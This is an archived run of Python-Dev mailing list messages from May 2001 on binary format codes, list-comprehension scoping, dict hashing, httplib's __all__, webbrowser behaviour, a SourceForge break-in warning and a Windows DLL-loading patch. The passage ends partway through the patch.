<200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: <20010531020154.A4404@thyrsus.com> Greg Ewing : > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". I had a similar idea, but your version is more elegant. -- Eric S. Raymond The common argument that crime is caused by poverty is a kind of slander on the poor. -- H. L. Mencken From tim_one at email.msn.com Thu May 31 08:20:21 2001 From: tim_one at email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:20:21 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > If we do this, we also need to consider whether we want > to make the corresponding change to regular for-loops. > Seems to me that all the reasons it's a good idea for > listcomps apply to for-loops as well. I expect there's no chance: unlike listcomps, for-loops allow break statements, and search loops that use the for index after a break (and out of the loop!) are common. > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops But I'm afraid that's also an advantage of leaving both alone. > instead of lambdas. > > Then we won't have to go into hiding until Guido dies or lifts > the fatwah against us. Death won't stop him -- he's Dutch . From tim_one at email.msn.com Thu May 31 08:28:04 2001 From: tim_one at email.msn.com (Tim Peters) Date: Thu, 31 May 2001 02:28:04 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Message-ID: [Greg Ewing] > So, just add one general one: > > %m.nb > > with n being the base. If n defaults to 2, you can read the "b" > as either "base" or "binary". Except .n has a different meaning already for integer conversions: >>> "%.5d" % 2 '00002' >>> "%.10o" % 377 '0000000571' >>> It would be inconsistent to hijack it to mean something else here. > Literals: > > 0b(5)21403 general I've actually got no use for bases outside {2, 8, 10, 16), and have never heard a request for them either, so I'd be at best -0. Better to stop documenting the full truth about int() <0.9 wink>. > 0b11001101 binary +1. > Conversion functions: > > base(x, n) general -0, as above. > bin(x) equivalent to base(x, 2) (for symmetry with > existing hex, oct) +1 if binary literals are added. > Type slots: > > __base__(x, n) Given the tenor of the above, add __bin__ and call it a day. > Backwards compatibility measures: > > hex(x) --> base(x, 16) > oct(x) --> base(x, 8) > bin(x) --> base(x, 2) > > base(x, n) checks __hex__ and __oct__ slots for special cases > of n=16 and n=8, falls back on __base__ > > There, that takes care of integers. Anyone want to do the > equivalent for floats ?-) Note that C99 introduces a hex notation for floats. From mal at lemburg.com Thu May 31 09:20:11 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:20:11 +0200 Subject: [Python-Dev] SF hacked References: <20010531035248.G690@xs4all.nl> Message-ID: <3B15F0AB.34F2F664@lemburg.com> Thomas Wouters wrote: > > It *seems*, from this site: > > http://66.92.75.28/~vladimir/themes-org.html > > that SourceForge has been hacked, and more seriously than SF first admits > (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) > And the same goes for apache.org, it looks like. Anyway, if anyone connected > *from* any of sourceforge's machines to anywhere else, in the last couple of > months, they'll be well advised to change their passwords and check for > intruders. The same goes if you connect through ssh and (foolishly ;) > allowed ssh-agent-forwarding to the SF machines. In that case, better check > all the machines that ssh-agent would give you unpassworded access to for > logins you don't recognize. The site above lists a number of sniffed > passwords, in case you want to check, but there's no reason for the hacker > not to have even more sniffed passwords lying about :) > > And if you have a login on apache.org, you probably want to change your > password in any case.... the above listed site has what seems to be a copy > of the shadow password file. FYI, the file's contents are no longer available it seems. Still, SF seems to be alarmed about this: ***************************************************************************** I M P O R T A N T P L E A S E R E A D ***************************************************************************** If you are seeing this it's because we've failed over from pr-shell1. This is a failover server only. As soon as pr-shell1 is better we will cut back to it. So please do not start any daemon process that you care about. - The SF Staff About the password change: this doesn't seem to be possible on the failover machine (I get a permission denied message). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Thu May 31 09:33:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 09:33:36 +0200 Subject: [Python-Dev] One more dict trick References: Message-ID: <3B15F3D0.AD646102@lemburg.com> Tim Peters wrote: > > If anyone has an app known or suspected to be sensitive to dict timing, > please try the patch here. Best I've been able to tell, it's a win. But > it's a radical change in approach, so I don't want to rush it. > > This gets rid of the polynomial machinery entirely, along with the branches > associated with updating the things, and the dictobject struct member > holding the table's poly. Instead it relies on that > > i = (5*i + 1) % n > > is a full-period RNG whenever n is a power of 2 (that's what guarantees it > will visit every slot), but perturbs that by adding in a few bits from the > full hash code shifted right each time (that's what guarantees every bit of > the hash code eventually influences the probe sequence, avoiding simple > quadratic-time degenerate cases). Cool idea... rips out all that algebra garble and replaces it with random beauty :-) In any case, this will avoid use the trouble of having to check those poly numbers every time Intel decides to bump the register width by another factor of two ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Thu May 31 10:43:32 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 04:43:32 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200 References: <3B15F3D0.AD646102@lemburg.com> Message-ID: <20010531044332.B5026@thyrsus.com> M.-A. Lemburg : > In any case, this will avoid use the trouble of having to check > those poly numbers every time Intel decides to bump the register > width by another factor of two ;-) This seems unlikely. 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume a memory density, of, say 2^20 machine words or roughly 8 megabytes per cubic centimeter (much, *much* better than we'll be able to do for the forseeable future -- remember power distribution and heat dissipation). Then, approximating the cubic relation between a sphere's volume and area by lopping off a power of four, we see that 2^64 64-bit words of memory would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 17 million kilometers. This is roughly twice the diameter of the Sun. 64-bit computers aren't going to run out of address space any time soon. 64-bit clocks counting seconds will turn over in approximately six trillion years, long after the expansion of the Universe will have dropped its energy density low enough to make computation...well, let's just say "difficult" and leave it at that. Nobody needs 128 bits of integer or floating-point precision, either. There's basically no source of data to compute with that's got anywhere near 22 significant digits of accuracy -- 48 bits is about the most people in scientific computing ever use. -- Eric S. Raymond [President Clinton] boasts about 186,000 people denied firearms under the Brady Law rules. The Brady Law has been in force for three years. In that time, they have prosecuted seven people and put three of them in prison. You know, the President has entertained more felons than that at fundraising coffees in the White House, for Pete's sake." -- Charlton Heston, FOX News Sunday, 18 May 1997 From mal at lemburg.com Thu May 31 11:23:52 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 31 May 2001 11:23:52 +0200 Subject: [Python-Dev] One more dict trick References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <3B160DA8.B9FF9AC2@lemburg.com> "Eric S. Raymond" wrote: > > M.-A. Lemburg : > > In any case, this will avoid us the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > > This seems unlikely. > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > a memory density, of, say 2^20 machine words or roughly 8 megabytes per > cubic centimeter (much, *much* better than we'll be able to do for the > forseeable future -- remember power distribution and heat dissipation). Where did you get those numbers from ? There are memory sticks with 128 MB around and these measure about 2.5 cm^2 * 1 mm. > Then, approximating the cubic relation between a sphere's volume and area > by lopping off a power of four, we see that 2^64 64-bit words of memory > would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about > 17 million kilometers. > > This is roughly twice the diameter of the Sun. 64-bit computers > aren't going to run out of address space any time soon. > > 64-bit clocks counting seconds will turn over in approximately six > trillion years, long after the expansion of the Universe will have > dropped its energy density low enough to make computation...well, > let's just say "difficult" and leave it at that. > > Nobody needs 128 bits of integer or floating-point precision, either. > There's basically no source of data to compute with that's got > anywhere near 22 significant digits of accuracy -- 48 bits is > about the most people in scientific computing ever use. Just you wait... someday marketing people will probably invent the world memory facility and start assigning a few hundred Terabytes for everyone on this planet to use for his/her data storage -- store once, use everywhere ;-) Let's assume we have 12e9 people on this planet by that time, then we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or roughly 2^80 bytes per civilization. Of course, they will want to run Python in order to manage that data and so will all those Palm uses hooking up to the facility... ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Thu May 31 12:31:07 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 06:31:07 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com> Message-ID: <20010531063107.B5510@thyrsus.com> M.-A. Lemburg : > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22. Let's assume > > a memory density, of, say 2^20 machine words or roughly 8 megabytes per > > cubic centimeter (much, *much* better than we'll be able to do for the > > forseeable future -- remember power distribution and heat dissipation). > > Where did you get those numbers from ? There are memory sticks > with 128 MB around and these measure about 2.5 cm^2 * 1 mm. Remember power distribution and heat dissipation. You can't just figure volume of the memory ICs, you have to include power and cooling and structural support too. I eyeballed some DRAM modules I had lying around. In any case, my figures aren't that sensitive to memory density. If I'm off by a factor of 64 the diameter of the memory sphere unly drops by a factor of four (it's that cube-root relationship between volume and radius). So it's only half the radius of the Sun. That's still way, *way* more mass than all the planets in the Solar System put together. > Just you wait... someday marketing people will probably invent the > world memory facility and start assigning a few hundred > Terabytes for everyone on this planet to use for his/her data > storage -- store once, use everywhere ;-) > > Let's assume we have 12e9 people on this planet by that time, then > we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or > roughly 2^80 bytes per civilization. Nah. Individual storage requirements would never get that large. Bill Joy did a study on this once and figured out that human beings can generate about 14GB of text during their lifetimes, max. In a system like the Web-on-steroids one you're supposing, higher-volume stuff like streaming video or Linux-kernel archives would be stored *once* with URLs pointing at them from peoples' individual stores. One terabyte (2^40) per person leaves plenty of headroom (two orders of magnitude larger). We could still handle a world population of 2^24 or roughly 16 billion people. (I think the size of the Library of Congress has been estimated at several thousand terabytes.) -- Eric S. Raymond I don't like the idea that the police department seems bent on keeping a pool of unarmed victims available for the predations of the criminal class. -- David Mohler, 1989, on being denied a carry permit in NYC From thomas at xs4all.net Thu May 31 12:45:33 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 12:45:33 +0200 Subject: [Python-Dev] One more dict trick In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <20010531124533.J690@xs4all.nl> On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote: > M.-A. Lemburg : > > In any case, this will avoid use the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > This seems unlikely. Why ? Bumping register size doesn't mean Intel expects to use it all as address space. They could be used for video-processing, or to represent a modest range of rationals , or to help core 'net routers deal with those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger registers as well. Oh wait... I get it! You were trying to get yourself in the historybooks as the guy that said "64 bits ought to be enough for everyone" :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From neal at metaslash.com Wed May 30 04:49:45 2001 From: neal at metaslash.com (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks for everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know. Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker at metaslash.com From beazley at cs.uchicago.edu Thu May 31 15:34:57 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Thu, 31 May 2001 08:34:57 -0500 (CDT) Subject: [Python-Dev] RE: Iteration variables and list comprehensions In-Reply-To: References: Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu> Greg Ewing writes: > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops instead of lambdas. Is this really an advantage? To me, the lambda semantics are a lot more intuitive in terms of matching the way that list comprehensions are actually used and ought to work (although I will agree that the for-loop explanation is a good way to describe the internals of what a list comprehension actually does). I think I would be opposed to changing normal for-loop semantics to match any change made in list-comprehensions. There are too many cases where you use a loop variable after finishing a loop and I suspect that this would break a huge amount of code. For example: for i in r: ... if whatever: break print i Besides, the semantic mismatch created between a listcomp and a for-loop pales in comparison to the mismatch that currently exists between the behavior of listcomps and all of the other operators. Of course, that's just my opinion--I could be wrong. > Then we won't have to go > into hiding until Guido dies or lifts the fatwah against us. fatwah? Uh... should I start talking to the witness protection program folks? Cheers, Dave From skip at pobox.com Thu May 31 20:02:51 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 13:02:51 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: Message-ID: <15126.34635.67975.31473@beluga.mojam.com> >>>>> "Robin" == Robin Becker writes: Robin> from httplib import * Robin> class Bongo(HTTPConnection): Robin> pass ... Robin> NameError: name 'HTTPConnection' is not defined It was a brain fart on my part when creating httplib.__all__. HTTPConnection was not included in that list. I will check in a fix. In the 2.1 release __all__ was defined as __all__ = ["HTTP"] I have changed that to __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", "HTTPException", "NotConnected", "UnknownProtocol", "UnknownTransferEncoding", "IllegalKeywordArgument", "UnimplementedFileMode", "IncompleteRead", "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader", "ResponseNotReady", "BadStatusLine", "error"] and will check the change into CVS shortly. (Thomas, keep an eye open for this as an addition to 2.1.1.) The workaround I would choose is to not use from "httplib import *": import httplib class Bongo(httplib.HTTPConnection): pass Robin> Changing the * to HTTPConnection in ttt.py removes the problem. Yup, that will also work. Before anyone asks, "Who died and make Skip King?", the scenario as I recall it was that the semantics of __all__ got settled on during discussions on python-dev (the goal of __all__ being to minimize namespace pollution by "from ... *"), but nobody stepped up immediately to do the gtunt work, so I volunteered. The problem in relying on one person (well, at least this one person) to do this was that I had only the following tools at my disposal to decide what belonged in __all__: * what was documented in the lib reference manual (which was at times incomplete) * my experience with the various modules (some of which was specialized, some of which was nonexistent) * the standard library (which generally doesn't use "from ... *" much) * input from python-dev (whose members also appear not to use "from ... *" very liberally) In retrospect, I probably should have polled c.l.py with a summary of what I came up with before the 2.1 ship date. If people would like me to do that now (before 2.2 gets anywhere close to release) to try and fill in as many missing symbols as possible, let me know. -- Skip Montanaro (skip at pobox.com) (847)971-7098 From skip at pobox.com Thu May 31 20:06:01 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 13:06:01 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin Message-ID: <15126.34825.167026.520535@beluga.mojam.com> I just updated httplib.py to expand the list of names in its __all__ list. I was operating on version 1.34. After the checkin I am looking at version 1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says "release21-maint". Did I muff it? If so, how should I do an unmuff operation? Skip From robin at jessikat.fsnet.co.uk Thu May 31 20:33:02 2001 From: robin at jessikat.fsnet.co.uk (Robin Becker) Date: Thu, 31 May 2001 19:33:02 +0100 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com> References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: In message <15126.34635.67975.31473 at beluga.mojam.com>, Skip Montanaro writes >>>>>> "Robin" == Robin Becker writes: > > Robin> from httplib import * > > Robin> class Bongo(HTTPConnection): > Robin> pass > ... > Robin> NameError: name 'HTTPConnection' is not defined > >It was a brain fart on my part when creating httplib.__all__. >HTTPConnection was not included in that list. I will check in a fix. >In the 2.1 release __all__ was defined as > > __all__ = ["HTTP"] > >I have changed that to > > __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", > "HTTPException", "NotConnected", "UnknownProtocol", > "UnknownTransferEncoding", "IllegalKeywordArgument", > "UnimplementedFileMode", "IncompleteRead", > "ImproperConnectionState", "CannotSendRequest", >"CannotSendHeader", > "ResponseNotReady", "BadStatusLine", "error"] thanks; I'm still a bit puzzled as to the exact semantics. It just looks wrong. Is __all__ the only way to get things into the * version of import? Presumably HTTPConnection is being marked as a potential global in the compile phase. -- Robin Becker From skip at pobox.com Thu May 31 21:27:12 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 14:27:12 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: <15126.39696.370516.926735@beluga.mojam.com> Robin> thanks; I'm still a bit puzzled as to the exact semantics. It Robin> just looks wrong. Is __all__ the only way to get things into the Robin> * version of import? Essentially, yes. If you want to just dispense with it __all__together (=:-o), you can textually replace __all__ with ___all__ in each of the standard library modules: cd /usr/local/lib/python2.1 for f in *.py ; do sed -e 's/___*all__/___all__/g' < $f > $f.tmp mv $f.tmp $f done Note that I didn't touch any files in directories under the basic Lib directory. Robin> Presumably HTTPConnection is being marked as a potential global Robin> in the compile phase. It has nothing to do with module compilation. The contents of __all__ are a static thing in the text of the .py file, and thusfar almost entirely due to me studying the inputs at hand and making a decision about what belonged and what didn't. Some python-dev people caught ommissions and added them before the 2.1 release. Other than that, the mistakes are all mine. I had some misgivings about the whole thing during the midst of the task and still do, but grumbled once and completed it. Skip From skip at pobox.com Thu May 31 21:57:21 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 14:57:21 -0500 Subject: [Python-Dev] weird webbrowser behavior Message-ID: <15126.41505.987887.477670@beluga.mojam.com> I'm using Gnome under Mandrake 8.0 and getting very strange results using webbrowser (indirectly via pydoc). Apparently, Gnome's init code sets the BROWSER environment variable to "nautilus" (much to my surprise) and webbrowser trusts it as the god's honest truth, even though nautilus has not been registered with the webbrowser module (am I supposed to add that sort of stuff to site.py?). Accordingly, _tryorder is ['nautilus'] but doesn't appear in _browser.keys() is ['lynx', 'links', 'netscape', 'kfm', 'mozilla']. I think webbrowser should either ignore elements of BROWSER if they have not previously been registered (and can't be found by _iscommand) or try to register them using GenericBrowser. Users are apparently not the only people setting BROWSER, so the comment in the code: # It's the user's responsibility to register handlers for any unknown # browser referenced by this value, before calling open(). seems like flawed logic to me. Skip From esr at thyrsus.com Thu May 31 22:08:21 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 16:08:21 -0400 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500 References: <15126.41505.987887.477670@beluga.mojam.com> Message-ID: <20010531160821.A10314@thyrsus.com> Skip Montanaro : > I think webbrowser should either ignore elements of BROWSER if > they have not previously been registered (and can't be found by _iscommand) > or try to register them using GenericBrowser. Users are apparently not the > only people setting BROWSER, so the comment in the code: Fred Drake and I are co-responsible for that code. If you want to patch it to do this, I won't object. -- Eric S. Raymond "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin, Historical Review of Pennsylvania, 1759. From fdrake at acm.org Thu May 31 22:18:26 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 16:18:26 -0400 (EDT) Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > I just updated httplib.py to expand the list of names in its __all__ list. > I was operating on version 1.34. After the checkin I am looking at version > 1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says > "release21-maint". Did I muff it? If so, how should I do an unmuff > operation? If that's really a muff, revert the change: cd .../Lib/ cvs diff -r1.34.2.1 -r1.34 httplib.py | patch and commit the new version as 1.34.2.2: cvs commit -m 'unmuff...' httplib.py -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From skip at pobox.com Thu May 31 22:30:22 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 15:30:22 -0500 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <20010531160821.A10314@thyrsus.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.43486.320228.376505@beluga.mojam.com> Eric> Fred Drake and I are co-responsible for that code. If you want to Eric> patch it to do this, I won't object. Here's a first pass that seems to work for me: https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470 though it doesn't attempt to recover if _tryorder winds up empty. Skip From skip at pobox.com Thu May 31 22:48:40 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 15:48:40 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Message-ID: <15126.44584.300357.360209@beluga.mojam.com> >> I just updated httplib.py to expand the list of names in its __all__ >> list. I was operating on version 1.34. After the checkin I am >> looking at version 1.34.2.1. I see that Lib/CVS/Tag exists in my >> directory tree and says "release21-maint". Did I muff it? If so, >> how should I do an unmuff operation? Fred> If that's really a muff, revert the change: Fred> cd .../Lib/ Fred> cvs diff -r1.34.2.1 -r1.34 httplib.py | patch Fred> and commit the new version as 1.34.2.2: Fred> cvs commit -m 'unmuff...' httplib.py Functionally, the checkin isn't a muff (it does have the change I intended), but I was worried about the version number. Should I have checked it in as version 1.34.2.1 or 1.35? Skip From fdrake at acm.org Thu May 31 23:00:34 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:00:34 -0400 (EDT) Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > or try to register them using GenericBrowser. Users are apparently not the > only people setting BROWSER, so the comment in the code: > > # It's the user's responsibility to register handlers for any unknown > # browser referenced by this value, before calling open(). > > seems like flawed logic to me. Eric S. Raymond writes: > Fred Drake and I are co-responsible for that code. If you want to patch it > to do this, I won't object. I wouldn't object either. I *do* object to the system setting that variable by default by either Mandrake or Gnome -- that's just stupid and inconsiderate of the user. Now, if anyone can provide support for Nautilis, I won't object to that either. Unfortunately, Mandrake's installer stinks at upgrading (it couldn't seem to locate my 7.2 installation) and I don't have the time to figure that out. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Thu May 31 23:04:30 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:04:30 -0400 (EDT) Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> <15126.44584.300357.360209@beluga.mojam.com> Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > Functionally, the checkin isn't a muff (it does have the change I intended), > but I was worried about the version number. Should I have checked it in as > version 1.34.2.1 or 1.35? If the change should happen on the branch, leave it in. If it's also needed on the HEAD, check it in again there, and you're done. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From MarkH at ActiveState.com Tue May 1 02:42:19 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 1 May 2001 10:42:19 +1000 Subject: [Python-Dev] Importing extensions on Windows 95 In-Reply-To: <3AED7248.B7386B83@lemburg.com> Message-ID: > Here's a stab at a patch. Could you review it and test it ? I > don't have enough knowledge of win32 for this... I think we can drop the getcwd call here completely. I prefer the patch below. Mark. Index: dynload_win.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v retrieving revision 2.7 diff -u -r2.7 dynload_win.c --- dynload_win.c 2000/10/05 10:54:45 2.7 +++ dynload_win.c 2001/05/01 00:36:40 @@ -163,24 +163,21 @@ #ifdef MS_WIN32 { - HINSTANCE hDLL; + HINSTANCE hDLL = NULL; char pathbuf[260]; - if (strchr(pathname, '\\') == NULL && - strchr(pathname, '/') == NULL) - { - /* Prefix bare filename with ".\" */ - char *p = pathbuf; - *p = '\0'; - _getcwd(pathbuf, sizeof pathbuf); - if (*p != '\0' && p[1] == ':') - p += 2; - sprintf(p, ".\\%-.255s", pathname); - pathname = pathbuf; - } - /* Look for dependent DLLs in directory of pathname first */ - /* XXX This call doesn't exist in Windows CE */ - hDLL = LoadLibraryEx(pathname, NULL, - LOAD_WITH_ALTERED_SEARCH_PATH); + LPTSTR dummy; + /* We use LoadLibraryEx so Windows looks for dependent DLLs + in directory of pathname first. However, Windows95 + can sometimes not work correctly unless the absolute + path is used. If GetFullPathName() fails, the LoadLibrary + will certainly fail too, so use its error code */ + if (GetFullPathName(pathname, + sizeof(pathbuf), + pathbuf, + &dummy)) + /* XXX This call doesn't exist in Windows CE */ + hDLL = LoadLibraryEx(pathname, NULL, + LOAD_WITH_ALTERED_SEARCH_PATH); if (hDLL==NULL){ char errBuf[256]; unsigned int errorCode; From thomas at xs4all.net Tue May 1 10:07:48 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 1 May 2001 10:07:48 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199 In-Reply-To: ; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700 References: Message-ID: <20010501100748.M16486@xs4all.nl> On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Python > In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python > > Modified Files: > bltinmodule.c > Log Message: > Fix buglet reported on c.l.py: map(fnc, file.xreadlines()) blows up. > Also a 2.1 bugfix candidate (am I supposed to do something with those?). No, not really. You can do me a favor by writing halfway decent checkin messages (no complaints there) and keep your fingers off the 'fix whitespace' button :) I keep a close eye on the checkins as they happen, and save away those that might need to be checked into the 2.1.1 branch. I'll go over them with a fine tooth comb when I'm approaching critical release mass :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Tue May 1 12:30:57 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 12:30:57 +0200 Subject: [Python-Dev] Importing extensions on Windows 95 References: Message-ID: <3AEE9061.32239814@lemburg.com> Mark Hammond wrote: > > > Here's a stab at a patch. Could you review it and test it ? I > > don't have enough knowledge of win32 for this... > > I think we can drop the getcwd call here completely. > > I prefer the patch below. If this works as expected, please check in the patch. (Note that I have not tested the patch I posted -- I've never used VC++ for anything else than compiling C extensions and GMP.) > Mark. > > Index: dynload_win.c > =================================================================== > RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v > retrieving revision 2.7 > diff -u -r2.7 dynload_win.c > --- dynload_win.c 2000/10/05 10:54:45 2.7 > +++ dynload_win.c 2001/05/01 00:36:40 > @@ -163,24 +163,21 @@ > > #ifdef MS_WIN32 > { > - HINSTANCE hDLL; > + HINSTANCE hDLL = NULL; > char pathbuf[260]; > - if (strchr(pathname, '\\') == NULL && > - strchr(pathname, '/') == NULL) > - { > - /* Prefix bare filename with ".\" */ > - char *p = pathbuf; > - *p = '\0'; > - _getcwd(pathbuf, sizeof pathbuf); > - if (*p != '\0' && p[1] == ':') > - p += 2; > - sprintf(p, ".\\%-.255s", pathname); > - pathname = pathbuf; > - } > - /* Look for dependent DLLs in directory of pathname first */ > - /* XXX This call doesn't exist in Windows CE */ > - hDLL = LoadLibraryEx(pathname, NULL, > - LOAD_WITH_ALTERED_SEARCH_PATH); > + LPTSTR dummy; > + /* We use LoadLibraryEx so Windows looks for dependent DLLs > + in directory of pathname first. However, Windows95 > + can 